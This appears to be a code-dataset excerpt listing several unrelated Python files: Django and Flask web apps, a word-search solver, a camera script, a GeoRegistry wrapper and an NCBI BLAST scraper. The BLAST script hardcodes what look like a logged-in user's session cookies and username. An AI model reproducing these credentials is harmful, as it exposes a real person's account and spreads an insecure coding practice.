blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
281
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
57
| license_type
stringclasses 2
values | repo_name
stringlengths 6
116
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 313
values | visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 18.2k
668M
⌀ | star_events_count
int64 0
102k
| fork_events_count
int64 0
38.2k
| gha_license_id
stringclasses 17
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 107
values | src_encoding
stringclasses 20
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 4
6.02M
| extension
stringclasses 78
values | content
stringlengths 2
6.02M
| authors
listlengths 1
1
| author
stringlengths 0
175
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
a4988105b8f44db42f20393940d9d3a3ae4e6178
|
e23a4f57ce5474d468258e5e63b9e23fb6011188
|
/125_algorithms/_exercises/templates/_algorithms_challenges/pybites/intermediate/191/bmi.py
|
0ee130d805eb92fd958498062113b022207001d6
|
[] |
no_license
|
syurskyi/Python_Topics
|
52851ecce000cb751a3b986408efe32f0b4c0835
|
be331826b490b73f0a176e6abed86ef68ff2dd2b
|
refs/heads/master
| 2023-06-08T19:29:16.214395 | 2023-05-29T17:09:11 | 2023-05-29T17:09:11 | 220,583,118 | 3 | 2 | null | 2023-02-16T03:08:10 | 2019-11-09T02:58:47 |
Python
|
UTF-8
|
Python
| false | false | 1,056 |
py
|
# data """Luke Skywalker,172,77
# C-3PO,167,75
# R2-D2,96,32
# Darth Vader,202,136
# Leia Organa,150,49
# Owen Lars,178,120
# Beru Whitesun lars,165,75
# R5-D4,97,32
# Biggs Darklighter,183,84
# Obi-Wan Kenobi,182,77
# Anakin Skywalker,188,84
# Chewbacca,228,112
# Han Solo,180,80
# Greedo,173,74
# Jek Tono Porkins,180,110
# Yoda,66,17
# Palpatine,170,75
# Boba Fett,183,78.2
# IG-88,200,140
# Bossk,190,113
# """
#
#
# ___ person_max_bmi data_?
# """Return (name, BMI float) of the character in data that
# has the highest BMI (rounded on 2 decimals)"""
# bmi # dict
# data_list ?.s.. "\n"
#
# ___ row __ ?
# current ?.s...s.. ","
# __ l.. ? > 1
# ? ? 0 f__ c.. 2 / i.. ? 1 / 100) ** 2
#
# name_max_bmi m.. b.. key b__.g..
# r.. ? r.. b.. ? 2
#
# # if __name__ == "__main__":
# # print(person_max_bmi())
|
[
"[email protected]"
] | |
1082ace705179dde53219daae2a8d6cf3f9c2bba
|
bf25e2478d11132ea4db03c4b8e12180dd72b39a
|
/reviewweb/urls.py
|
6b528d4606635fb1e55ffc279c25006000fdc78c
|
[] |
no_license
|
hassanito/reviewweb
|
0892d6d444e93e88daabaa2289b7a1c8a8e69deb
|
3233299f0570f60ef0a1d321e56d19104900ceac
|
refs/heads/master
| 2020-06-25T13:54:27.716798 | 2019-09-09T21:09:13 | 2019-09-09T21:09:13 | 199,328,513 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,689 |
py
|
"""reviewweb URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path,include
from . import views
urlpatterns = [
path('admin/', admin.site.urls),
path('', views.HomePage.as_view(), name="home"),
path("test/", views.TestPage.as_view(), name="test"),
path('thanks', views.ThanksPage.as_view(), name="thanks"),
path('admin', admin.site.urls),
path('accounts/',include('accounts.urls',namespace='accounts')),
path('accounts/',include('django.contrib.auth.urls')),
path('shops/',include('shops.urls',namespace='shops')),
path('ajax_calls/search/', views.autocompleteModel),
path('login/',views.ajax_login),
path('oauth/', include('social_django.urls', namespace='social')), # <--
path('comment/',views.comment,name='comment'),
path('review/',views.review_ajax,name='review_ajax'),
]
from django.conf import settings
from django.conf.urls.static import static
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
[
"1Aa_12345"
] |
1Aa_12345
|
600d648aef968fa6d9aaf3ddd8d410059382df4b
|
65f856bb3c782fe2fec794192260d5b7aa997ef3
|
/wsc_django/wsc_django/apps/shop/services.py
|
0a53f3c8e183bdcaeeefad41252f7a5440069671
|
[
"MIT"
] |
permissive
|
hzh595395786/wsc_django
|
0c8faf0cac1d8db8d9e3fa22f6914b6b64bf788b
|
c0a4de1a4479fe83f36108c1fdd4d68d18348b8d
|
refs/heads/main
| 2023-06-06T07:26:17.979944 | 2021-06-24T13:14:53 | 2021-06-24T13:14:53 | 336,303,377 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,909 |
py
|
from uuid import uuid4
from django.db.models import Count
from product.constant import ProductStatus
from shop.models import Shop, HistoryRealName, ShopRejectReason, PayChannel
from shop.utils import get_shop_mini_program_qcode, put_qcode_file_to_tencent_cos
from user.models import User
from shop.constant import (
ShopStatus,
)
def create_shop(shop_info: dict, user: User):
"""
创建一个商铺
:param shop_info:{
"shop_name": "name",
"shop_img": "http://xxx",
"shop_province": 420000,
"shop_city": 420100,
"shop_county": 420101,
"shop_address": "光谷智慧谷一栋505",
"description": "xxxx",
"suggest_phone": "153xxxxxxxx",
"shop_phone": "152xxxxxxxx",
"super_admin_id": 1
}
:param user: 创建商铺的用户对象
:return:
"""
# 创建店铺
# 随机一个商铺编码, 查一下,万一重复就再来一个
while True:
shop_code = str(uuid4())[-9:]
shop = Shop.objects.filter(shop_code=shop_code)
if not shop:
break
shop_info["shop_code"] = shop_code
shop_info["shop_phone"] = user.phone
shop_info["super_admin_id"] = user.id
shop = Shop(**shop_info)
shop.save()
return shop
def create_pay_channel(pay_channel_info: dict, shop_id: int):
"""
创建一个商铺的pay_channel
:param pay_channel_info:
:param shop_id:
:return:
"""
shop_pay_channel = PayChannel(shop_id=shop_id, **pay_channel_info)
shop_pay_channel.save()
return shop_pay_channel
def create_shop_reject_reason_by_shop_id(shop_id: int, reject_reason: str):
"""
给拒绝的商铺创建一个拒绝理由
:param shop_id:
:return:
"""
reject_reason = ShopRejectReason(id=shop_id, reject_reason=reject_reason)
reject_reason.save()
return reject_reason
def create_shop_creator_history_realname(shop_id: int, history_realname: str):
"""
储存商铺创建者的历史真实姓名, 与店铺绑定
:param shop_id:
:param history_realname:
:return:
"""
history_realname = HistoryRealName(id=shop_id, realname=history_realname)
history_realname.save()
return history_realname
def create_shop_mini_program_qcode(shop_code: str):
"""
为商铺创建小程序码
:param shop_code:
:return:
"""
qcode_file = get_shop_mini_program_qcode(shop_code)
success, url = put_qcode_file_to_tencent_cos(qcode_file, shop_code)
return success, url
def update_shop_data(shop: Shop, args: dict):
"""
修改商铺信息
:param shop:
:param args:
:return:
"""
for k, v in args.items():
setattr(shop, k, v)
shop.save()
return shop
def get_shop_by_shop_code(shop_code: str, only_normal: bool = True):
"""
通过shop_code获取shop对象
:param shop_code: 商铺编码
:param only_normal: 只查询正常
:return:
"""
shop = Shop.objects.filter(shop_code=shop_code)
if shop and only_normal:
shop = shop.filter(status=ShopStatus.NORMAL)
shop = shop.first()
return shop
def get_shop_by_shop_id(shop_id: int, filter_close: bool = True):
"""
通过商铺id获取商
:param shop_id: 商铺id
:param filter_close: 不查询关闭的
:return:
"""
shop = Shop.objects.filter(id=shop_id)
if shop and filter_close:
shop = shop.exclude(status=ShopStatus.CLOSED)
shop = shop.first()
return shop
def list_shop_by_shop_ids(shop_ids: list, filter_close: bool = True, role: int = 1):
"""
通过ship_id列表查询商铺列表
:param shop_ids:
:param filter_close:过滤关闭
:param role: 访问角色,1:为普通用户,2.为admin用户,普通用户访问时只能查到已审核的店铺
:return:
"""
shop_list_query = Shop.objects.filter(id__in=shop_ids)
if shop_list_query and filter_close:
shop_list_query = shop_list_query.exclude(status=ShopStatus.CLOSED)
if role == 1:
shop_list_query = shop_list_query.filter(status=ShopStatus.NORMAL)
shop_list = shop_list_query.all()
return shop_list
def list_shop_by_shop_status(shop_status: int):
"""
查询某一状态的所有商铺
:param shop_status:
:return:
"""
shop_list = Shop.objects.filter(status=shop_status).order_by('update_at').all()
return shop_list
def list_shop_creator_history_realname(shop_ids: list):
"""
找出商铺创建的历史真实姓名列表
:param shop_ids:
:return:
"""
history_realname_list = (
HistoryRealName.objects.filter(id__in=shop_ids).all()
)
return history_realname_list
def list_shop_reject_reason(shop_ids: list):
"""查询出所有的商铺拒绝信息"""
reject_reason_list = ShopRejectReason.objects.filter(id__in=shop_ids).all()
return reject_reason_list
|
[
"[email protected]"
] | |
84be4e8d39c28cb877ef19a7d621b0647ea40be7
|
b3ee3f3f1c5493770919bdfd39680d87be848b9b
|
/Week5/exist.py
|
2ba9d3ce55a12872028e78a8e46a3367f827ab60
|
[] |
no_license
|
shubhrarajadhyaksha/Wallbreakers
|
ae3ef97454636ce068330fe10be9fef7ed58f099
|
e6f8f6045c1a4f60c6e719e88abacfb71d23e995
|
refs/heads/master
| 2020-06-08T03:14:03.160010 | 2019-09-02T20:21:33 | 2019-09-02T20:21:33 | 193,148,679 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 999 |
py
|
class Solution:
def exist(self, board: List[List[str]], word: str) -> bool:
rows=len(board)
cols=len(board[0])
index=0
l=len(word)
def dfs(board,r,c,i):
if i==l:
return True
if r<0 or r>=rows:
return False
if c<0 or c>=cols:
return False
char=board[r][c]
if char==word[i]:
board[r][c]="."
if dfs(board,r+1,c,i+1) or dfs(board,r-1,c,i+1) or dfs(board,r,c+1,i+1)or dfs(board,r,c-1,i+1):
return True
board[r][c]=char
return False
for r in range(rows):
for c in range(cols):
if dfs(board,r,c,0):
return True
return False
|
[
"[email protected]"
] | |
f73d1fe32098c5bf77b55cbe7ca232ff32b2a49a
|
1475fd4bf28de5647860e0d106af2b459e114ae9
|
/app/data.py
|
4f4330cf2270a5595071bd0221f3949856fc9bf6
|
[
"MIT"
] |
permissive
|
snspam/sn_spam
|
66232942685d37dbbbb861d331ec52120034153a
|
e0bb8e9c843e26e5f4be8a49a960ebf7a0d5bfd5
|
refs/heads/master
| 2020-03-19T09:16:46.460571 | 2018-06-07T23:20:02 | 2018-06-07T23:20:02 | 136,274,192 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,386 |
py
|
import pandas as pd
class Data:
data_dir = 'independent/data/'
# public
def __init__(self, generator_obj, util_obj):
self.gen_obj = generator_obj
self.util_obj = util_obj
def get_rel_ids(self, dfs, domain='twitter', relations=[], sim_dir=None,
exact=True):
sim_path = '%s%s/%s/' % (Data.data_dir, domain, sim_dir)
dd = None if sim_dir is None else sim_path
new_dfs = {}
for dset in ['train', 'val', 'test']:
df = dfs[dset]
if df is not None:
df = self.gen_obj.gen_relational_ids(df, relations,
data_dir=dd, exact=exact,
dset=dset)
new_dfs[dset] = df
return new_dfs
def get_data(self, start=0, end=1000, domain='twitter', evaluation='cc'):
t1 = self.util_obj.out('reading in data...')
skiprows = range(1, start)
nrows = end - start
result = None
if evaluation == 'tt':
train_path = Data.data_dir + domain + '/train.csv'
test_path = Data.data_dir + domain + '/test.csv'
train_df = pd.read_csv(train_path, lineterminator='\n',
skiprows=skiprows, nrows=nrows)
train_df = train_df.reset_index().drop(['index'], axis=1)
test_df = pd.read_csv(test_path, lineterminator='\n')
result = (train_df, test_df)
elif evaluation == 'cc':
path = Data.data_dir + domain + '/comments.csv'
coms_df = pd.read_csv(path, lineterminator='\n',
skiprows=skiprows, nrows=nrows)
coms_df = coms_df.reset_index().drop(['index'], axis=1)
result = coms_df
self.util_obj.time(t1)
return result
def sep_data(self, df, relations=[], domain='twitter', data='both'):
if data == 'both':
return df
ids = set()
list_filter = lambda x: True if x != [] else False
for relation, group, group_id in relations:
q_df = df[df[group_id].apply(list_filter)]
ids.update(set(q_df['com_id']))
ind_df = df[~df['com_id'].isin(ids)]
rel_df = df[df['com_id'].isin(ids)]
result_df = ind_df if data == 'ind' else rel_df
return result_df
def split_data(self, df, train_size=0.7, val_size=0.15, val_split=0.0):
num_coms = len(df)
if train_size == 0 and val_size == 0: # used for tt eval
data = {'train': df, 'val': None, 'test': None}
elif val_size == 0: # no relational training data
split_ndx = int(num_coms * train_size)
train_df = df[:split_ndx]
test_df = df[split_ndx:]
data = {'train': train_df, 'val': None, 'test': test_df}
else:
split_ndx1 = int(num_coms * train_size)
split_ndx2 = split_ndx1 + int(num_coms * val_size)
train_df = df[:split_ndx1]
val_df = df[split_ndx1:split_ndx2]
test_df = df[split_ndx2:]
if val_split > 0.0:
val_split_ndx = int(len(val_df) * (1 - val_split))
val_df = val_df[val_split_ndx:]
data = {'train': train_df, 'val': val_df, 'test': test_df}
return data
|
[
"[email protected]"
] | |
a69fba4e5d07f0b75304b6ba75e87e6f68467fdc
|
1e449c2b408c59f7722aeeacf01ac6d904016785
|
/boardapp/models.py
|
488018ad7e9ed9e552116797d04d734d4ff54611
|
[] |
no_license
|
alittlekitten/hangoverlion
|
62930111298000ceb99aa282bbbdbc596150f5c5
|
3643adfac2fb5c420a00e9548ef5c43a629f0c78
|
refs/heads/master
| 2023-04-29T00:29:59.874724 | 2019-06-01T10:17:53 | 2019-06-01T10:17:53 | 189,718,352 | 0 | 0 | null | 2023-04-21T20:33:41 | 2019-06-01T10:13:16 |
JavaScript
|
UTF-8
|
Python
| false | false | 600 |
py
|
from django.db import models
# Create your models here.
class Board(models.Model):
title = models.CharField(max_length=200)
name = models.CharField(max_length=50)
pub_date = models.DateTimeField('date published')
body = models.TextField()
def __str__(self):
return self.title
class Comment(models.Model):
board = models.ForeignKey('Board',on_delete=models.CASCADE, related_name='comments')
comment_author = models.CharField(max_length = 10)
comment_contents = models.TextField(max_length=200)
created_date = models.DateTimeField(auto_now_add=True)
|
[
"alittlekitten"
] |
alittlekitten
|
bcc75b28b810ed3342694c31eda9379e6b0b1569
|
0af56ece1f50f93cd4e4841ba101600f958fe94c
|
/camera.py
|
0887896256ffbf12bfd73d540af4f556ee8777e2
|
[] |
no_license
|
strikerdlm/HAB-pi-cam
|
df21f8f483b0c8b5e0ca9ffb53cdec7af9f5ca91
|
b1eb0f4c87501adcae7cb5ec28f8ad96ddaa0e4d
|
refs/heads/master
| 2021-09-07T07:21:05.872448 | 2018-02-19T14:17:41 | 2018-02-19T14:17:41 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,917 |
py
|
#!/usr/bin/python2
# Import required modules
import picamera
import time
import signal
import sys
import os
# The following code will write the Process ID of this script to a hidden file
pid = os.getpid()
PIDfilename = ".PID"
PIDfile = open(PIDfilename, "wt")
PIDfile.write(str(pid))
PIDfile.close()
# Variables
numpics = 5 # number of still pictures taken
numburst = 5 # number of burst pictures taken
rectime = 300 # length of time to record in each loop between pictures (in seconds)
# Functions
# This function will take a number of still pictures, as defined by the input parameter
def capture(numPics):
for i in range(0,numPics):
picname = str(time.strftime('%I%M%S%p_%d-%m-%y'))
camera.capture('Pictures/' + picname + '.jpg')
time.sleep(1)
# This function will take a burst of pictures
def burst(numBurst):
camera.capture_sequence([ 'Pictures/' + str(time.strftime('%I%M%S%p_%d-%m-%y')) + '_burst' + str(i+1) + '.jpg' for i in range(numBurst) ])
def record(recTime):
vidname = str(time.strftime('%I%M%S%p_%d-%m-%y'))
camera.start_recording('Videos/' + vidname + '.h264')
time.sleep(recTime)
camera.stop_recording()
time.sleep(1)
# The following function handles the case when a kill signal is sent to the process
def signal_term_handler(signal, frame):
camera.close()
os.remove(PIDfilename) #removes the hidden temp PID file
sys.exit()
signal.signal(signal.SIGTERM, signal_term_handler)
try:
with picamera.PiCamera() as camera:
while True:
camera.start_preview(alpha=0) #starting the preview "warms up" the camera, and is recommended in the PiCamera documentation
time.sleep(2)
capture(numpics)
burst(numburst)
record(rectime)
camera.stop_preview()
time.sleep(2)
# Handles the case when user exits the running script using Control+C
except KeyboardInterrupt:
camera.close()
os.remove(PIDfilename) #removes the hidden temp PID file
sys.exit()
|
[
"[email protected]"
] | |
b176a24c12a2f81960d594b227e0eb66dc7ca889
|
c192132c7c2b815d480b243b591c2c9dac8d969b
|
/result.py
|
f369eb20ad333d584dbf29c1573ee366b42523f5
|
[] |
no_license
|
Annihilater/blast.ncbi.nlm.nih.gov
|
b967dd3abf1ca1b075566262ee11906d7f5170ce
|
e62dabb4f9fc7c0e359051e3cdbc97c45f1fbdee
|
refs/heads/master
| 2020-08-24T14:32:54.451809 | 2019-10-23T09:41:37 | 2019-10-23T09:41:37 | 216,845,290 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,854 |
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2019/10/23 11:16
# @Author: yanmiexingkong
# @email : [email protected]
# @File : result.py
import requests
def get_result(rid):
"""
通过 rid 获取结果
:param rid:
:return:
"""
url = "https://blast.ncbi.nlm.nih.gov/Blast.cgi"
headers = {
'authority': "blast.ncbi.nlm.nih.gov",
'pragma': "no-cache",
'cache-control': "no-cache,no-cache",
'upgrade-insecure-requests': "1",
'user-agent': "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36",
'sec-fetch-mode': "navigate",
'sec-fetch-user': "?1",
'origin': "https://blast.ncbi.nlm.nih.gov",
'content-type': "application/x-www-form-urlencoded",
'accept': "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3",
'sec-fetch-site': "same-origin",
'referer': "https://blast.ncbi.nlm.nih.gov/Blast.cgi",
'accept-encoding': "gzip, deflate, br",
'accept-language': "zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6",
'cookie': "MyBlastUser=1-K62_H2PRYnAJWAW8C499055; ncbi_sid=5AAB49C2DAD5CBD1_0000SID; _ga=GA1.2.1760716258.1571642619; _gid=GA1.2.1120047674.1571642619; _ga=GA1.3.1760716258.1571642619; _gid=GA1.3.1120047674.1571642619; QSI_HistorySession=https%3A%2F%2Fwww.nlm.nih.gov%2F%23~1571655071695; ___rl__test__cookies=1571655469341; OUTFOX_SEARCH_USER_ID_NCOO=1690574555.305844; books.article.report=; MyNcbiSigninPreferences=O25jYmlscyY%3D; ncbi_prevPHID=CE8CB87BDAD9B9910000000000110007.m_8.09; WebCubbyUser=YFK36EUALZSLFML717L8VTJ8L7VZ587M%3Blogged-in%3Dtrue%3Bmy-name%3Dyanmiexingkong%3Bpersistent%3Dfalse%405AAB49C2DAD5CBD1_0000SID; BlastCubbyImported=active; ncbi_pinger=N4IgDgTgpgbg+mAFgSwCYgFwgKwEFcBCALAJwDCATACK5XZkFUkCM2A7Mx6UcwGzbYAygEkqIADQgArgDsANgHsAhqhlQAHgBdMoCphAAjOUoDO2yQGZ9MiBJBFrUAO5HTm6CalzNJu9n12nPoAZkpyJlB2FAAM+tjRZCQWFKw0AKK8ABy4LNF5+QWFzFHFWK5mGDaVzuXuUJ7eJhgAcgDyzWlRemXGZgB0MgDGBsgDcgC2A8iIfQDmCjBRJPrMJDF2FrFYzDGxlqUgq+uW3YecbBtWWKHhkZYOWO5SdyAWmQGWy1i8JD8kbFZJEQtiAfmxeGwKBcgVcQNE+hReH1ikCHtJ5MpVBpzPZ/Ns/LDMmwHJJsGjmNFeLw/NTttgKHpSRcsHtQQcAQ4AL6coA,MyBlastUser=1-K62_H2PRYnAJWAW8C499055; ncbi_sid=5AAB49C2DAD5CBD1_0000SID; _ga=GA1.2.1760716258.1571642619; _gid=GA1.2.1120047674.1571642619; _ga=GA1.3.1760716258.1571642619; _gid=GA1.3.1120047674.1571642619; QSI_HistorySession=https%3A%2F%2Fwww.nlm.nih.gov%2F%23~1571655071695; ___rl__test__cookies=1571655469341; OUTFOX_SEARCH_USER_ID_NCOO=1690574555.305844; books.article.report=; MyNcbiSigninPreferences=O25jYmlscyY%3D; ncbi_prevPHID=CE8CB87BDAD9B9910000000000110007.m_8.09; WebCubbyUser=YFK36EUALZSLFML717L8VTJ8L7VZ587M%3Blogged-in%3Dtrue%3Bmy-name%3Dyanmiexingkong%3Bpersistent%3Dfalse%405AAB49C2DAD5CBD1_0000SID; BlastCubbyImported=active; ncbi_pinger=N4IgDgTgpgbg+mAFgSwCYgFwgKwEFcBCALAJwDCATACK5XZkFUkCM2A7Mx6UcwGzbYAygEkqIADQgArgDsANgHsAhqhlQAHgBdMoCphAAjOUoDO2yQGZ9MiBJBFrUAO5HTm6CalzNJu9n12nPoAZkpyJlB2FAAM+tjRZCQWFKw0AKK8ABy4LNF5+QWFzFHFWK5mGDaVzuXuUJ7eJhgAcgDyzWlRemXGZgB0MgDGBsgDcgC2A8iIfQDmCjBRJPrMJDF2FrFYzDGxlqUgq+uW3YecbBtWWKHhkZYOWO5SdyAWmQGWy1i8JD8kbFZJEQtiAfmxeGwKBcgVcQNE+hReH1ikCHtJ5MpVBpzPZ/Ns/LDMmwHJJsGjmNFeLw/NTttgKHpSRcsHtQQcAQ4AL6coA; ncbi_sid=5AAB49C2DAD5CBD1_0000SID; BlastCubbyImported=passive",
'Postman-Token': "effbbf9e-09ff-4958-8a0e-a8c3d2719ae1,ffe9004f-7563-4ea5-ad02-943a343657a8",
'Host': "blast.ncbi.nlm.nih.gov",
'Content-Length': "1354",
'Connection': "keep-alive"
}
data = {'ADV_VIEW': 'true', 'ALIGNMENTS': '100', 'ALIGNMENT_VIEW': 'Pairwise', 'BLAST_PROGRAMS': 'blastp',
'CDD_RID': 'UWU3DJDS015', 'CDD_SEARCH_STATE': '2', 'CLIENT': 'web', 'COMPOSITION_BASED_STATISTICS': '2',
'CONFIG_DESCR': '2%2C3%2C4%2C5%2C6%2C7%2C8', 'DATABASE': 'nr_v5', 'DB_DISPLAY_NAME': 'nr',
'DESCRIPTIONS': '100', 'EQ_OP': 'AND', 'EXPECT': '10', 'FILTER': 'F', 'FORMAT_NUM_ORG': '1',
'FORMAT_OBJECT': 'Alignment', 'FORMAT_TYPE': 'HTML', 'FULL_DBNAME': 'nr_v5', 'GAPCOSTS': '11%2B1',
'GET_SEQUENCE': 'true', 'HSP_RANGE_MAX': '0', 'JOB_TITLE': '%2B5ubb%2B', 'LAYOUT': 'OneWindow',
'LINE_LENGTH': '60', 'MASK_CHAR': '2', 'MASK_COLOR': '1', 'MATRIX_NAME': 'BLOSUM62', 'MAX_NUM_SEQ': '100',
'NCBI_GI': 'false', 'NEW_VIEW': 'true', 'NUM_DIFFS': '0', 'NUM_OPTS_DIFFS': '0', 'NUM_ORG': '1',
'NUM_OVERVIEW': '100', 'ORG_DBS': 'giless_dbvers5', 'PAGE': 'Proteins', 'PAGE_TYPE': 'BlastSearch',
'PROGRAM': 'blastp',
'QUERYFILE': '%3E5ubb%0D%0ASQVINGEMQFYARAKLFYQEVPATEEGMMGNFIELSSPDIQASQKFLRKFVGGPGRAGTDCALDCGSGIGRVSKHVLLPVFNSVELVDMMESFLLEAQNYLQVKGDESYHCYSLQEFTPPFRRYDVIWIQWVSGHLTDKDLLAFLSRCRDGLKENGIIILKDNVAREGCILDLSDSSVTRDMDILRSLIRKSGLVVLGQEKQDGFPEQCIPVWMFALH%0D%0A',
'QUERY_INFO': '%2B5ubb%2B', 'QUERY_LENGTH': '218', 'REPEATS': '45518', 'RTOE': '27',
'SAVED_SEARCH': 'true', 'SEARCH_DB_STATUS': '31', 'SELECTED_PROG_TYPE': 'blastp', 'SERVICE': 'plain',
'SHORT_QUERY_ADJUST': 'on', 'SHOW_CDS_FEATURE': 'false', 'SHOW_LINKOUT': 'true', 'SHOW_OVERVIEW': 'true',
'UNIQ_DEFAULTS_NAME': 'A_SearchDefaults_1iMhfz_1v71_duIAy0mW1FA_GTXQl_2J8uR3', 'USER_DEFAULT_MATRIX': '4',
'USER_DEFAULT_PROG_TYPE': 'blastp', 'USER_TYPE': '1', 'WORD_SIZE': '6', '_PGR': '6', 'db': 'protein',
'stype': 'protein', 'CMD': 'Get'}
data.update({'RID': rid})
response = requests.post(url=url, data=data, headers=headers)
html = response.text
with open('data/html/result.html', 'w') as f:
f.write(html)
if __name__ == '__main__':
rid = 'UX0VYAFM015'
rid2 = 'UXTZXYRW015'
rid3 = 'V019SAM701R'
get_result(rid3)
|
[
"[email protected]"
] | |
9efe79a16c6f27bddfc4536d573389398935b830
|
3b5d1a53af8d2f4094005f342403eabc7af9c980
|
/moderation_module/storage/logging_data.py
|
5f1eb3107e2c0a2e75844b5cbdd60700cde60414
|
[
"MIT"
] |
permissive
|
alentoghostflame/StupidAlentoBot
|
daa828be3d47b24d3e13d500155a6a0d2019f724
|
c024bfb79a9ecb0d9fda5ddc4e361a0cb878baba
|
refs/heads/master
| 2021-06-30T17:50:14.997416 | 2021-06-08T03:54:24 | 2021-06-08T03:54:24 | 237,541,303 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 387 |
py
|
from alento_bot import guild_data_transformer
import logging
import typing
logger = logging.getLogger("main_bot")
@guild_data_transformer(name="guild_logging_config")
class GuildLoggingConfig:
def __init__(self):
self.toggled_on: bool = False
self.log_channel_id: int = 0
self.exempt_channels: typing.Set[int] = set()
self.log_bots: bool = False
|
[
"[email protected]"
] | |
6f927f95ffc8e9ede4b6ba26df040a784d1f5146
|
8f5cb19e9c6a0670100b4a4fbdbb892d94ccd4a8
|
/deployment/georegistry.py
|
5c1e240d6a6b964f6e177dd39a8f7f9b1dc6a607
|
[] |
no_license
|
invisibleroads/georegistry
|
84438e680e56ac716f60d23784f05469c4888841
|
df56cc17b01a794bfbd53f354bb5fa9abeb420cc
|
refs/heads/master
| 2023-08-24T03:34:50.554375 | 2011-05-05T16:36:19 | 2011-05-05T16:36:19 | 966,680 | 1 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,359 |
py
|
'GeoRegistry API Python wrapper'
# Import system modules
import urllib
import urllib2
import simplejson
# Core
baseURL = 'http://georegistry.invisibleroads.com'
def updateFeatures(key, srid, featureCollection, tags, public=False):
'Update features using the GeoRegistry web service'
# Initialize
url = baseURL + '/features'
# Call
responseData = call(url, {
'key': key,
'srid': srid,
'featureCollection': featureCollection,
'tags': '\n'.join(tags),
'public': 1 if public else 0,
}, 'POST')
# Return
return [int(x) for x in responseData.splitlines()]
def deleteFeatures(key, featureIDs):
'Delete features using the GeoRegistry web service'
# Initialize
url = baseURL + '/features'
# Call
call(url, {
'key': key,
'featureIDs': '\n'.join(str(x) for x in featureIDs),
}, 'DELETE')
def getTags(key):
'Get tags with visible features using the GeoRegistry web service'
# Initialize
url = baseURL + '/tags'
# Call
responseData = call(url + '.json', {
'key': key,
}, 'GET')
# Return
return responseData.splitlines()
def viewMaps(key, srid, tags, simplified=True, bboxFormat='yxyx', bbox=None):
'Assemble a map using the GeoRegistry web service'
# Initialize
url = baseURL + '/maps'
# Call
responseData = call(url + '.json', {
'key': key,
'srid': srid,
'tags': '\n'.join(tags),
'bboxFormat': bboxFormat,
'bbox': bbox if bbox else '',
'simplified': 1 if simplified else 0,
}, 'GET')
# Return
return responseData
# Helpers
def call(url, valueByName, method):
'Call a method in the GeoRegistry web service'
requestData = urllib.urlencode(valueByName.items())
request = Request(method, url, requestData) if method.upper() == 'POST' else Request(method, url + '?' + requestData)
try:
response = urllib2.urlopen(request)
except urllib2.HTTPError, error:
raise GeoRegistryError(error.read())
return response.read()
class Request(urllib2.Request):
def __init__(self, method, *args, **kwargs):
self._method = method
urllib2.Request.__init__(self, *args, **kwargs)
def get_method(self):
return self._method
# Error
class GeoRegistryError(Exception):
pass
|
[
"[email protected]"
] | |
b8a16ce325c65f9044f2ff1ecf5af27060e6b600
|
c719e07b1b4edb9596d8e286938bf29c9c8c3b4a
|
/blog.py
|
b59b2a7ec3369c2af7a07ec28a7f1443448e5ba5
|
[] |
no_license
|
furkanctn/FlaskBlogAPP
|
bbdcb37da4de8e8f14c3226b31c91502657d02f5
|
2fba43dcc5f18f378a9590f2f5223bfac1599ddc
|
refs/heads/main
| 2023-07-01T02:37:37.275304 | 2021-08-12T07:49:55 | 2021-08-12T07:49:55 | 395,234,915 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 8,453 |
py
|
from re import S
from MySQLdb import cursors
from flask import Flask, render_template,flash,redirect,url_for,session,logging,request
from flask_mysqldb import MySQL
from wtforms import Form,StringField,TextAreaField,PasswordField, form,validators
from passlib.hash import sha256_crypt
from functools import wraps
from wtforms.widgets.core import Select
#Kullanıcı Giriş Deceratorü
def login_required(f):
@wraps(f)
def decorated_function(*args, **kwargs):
if "logged_in" in session:
return f(*args,**kwargs)
else:
flash("Bu sayfayı görüntülemek için lütfen giriş yapın","danger")
return redirect(url_for("login"))
return decorated_function
# Kullanıcı Kayıt Formu
class RegisterForm(Form):
name = StringField( "İsim Soyisim",validators = [validators.length(min=4,max=25)])
username = StringField( "Kullanıcı Adı",validators = [validators.length(min=4,max=25)])
email = StringField( "email adresi",validators = [validators.Email(message= "Lütfen geçerli bir Email adresi giriniz..")])
password = PasswordField("Parola",validators = [validators.DataRequired(message= "Lütfen bir paralo belirleyiniz."),validators.EqualTo(fieldname= "confirm",message= "Parolanız uyuşmuyor")])
confirm = PasswordField("Parola Doğrula")
class LoginForm(Form):
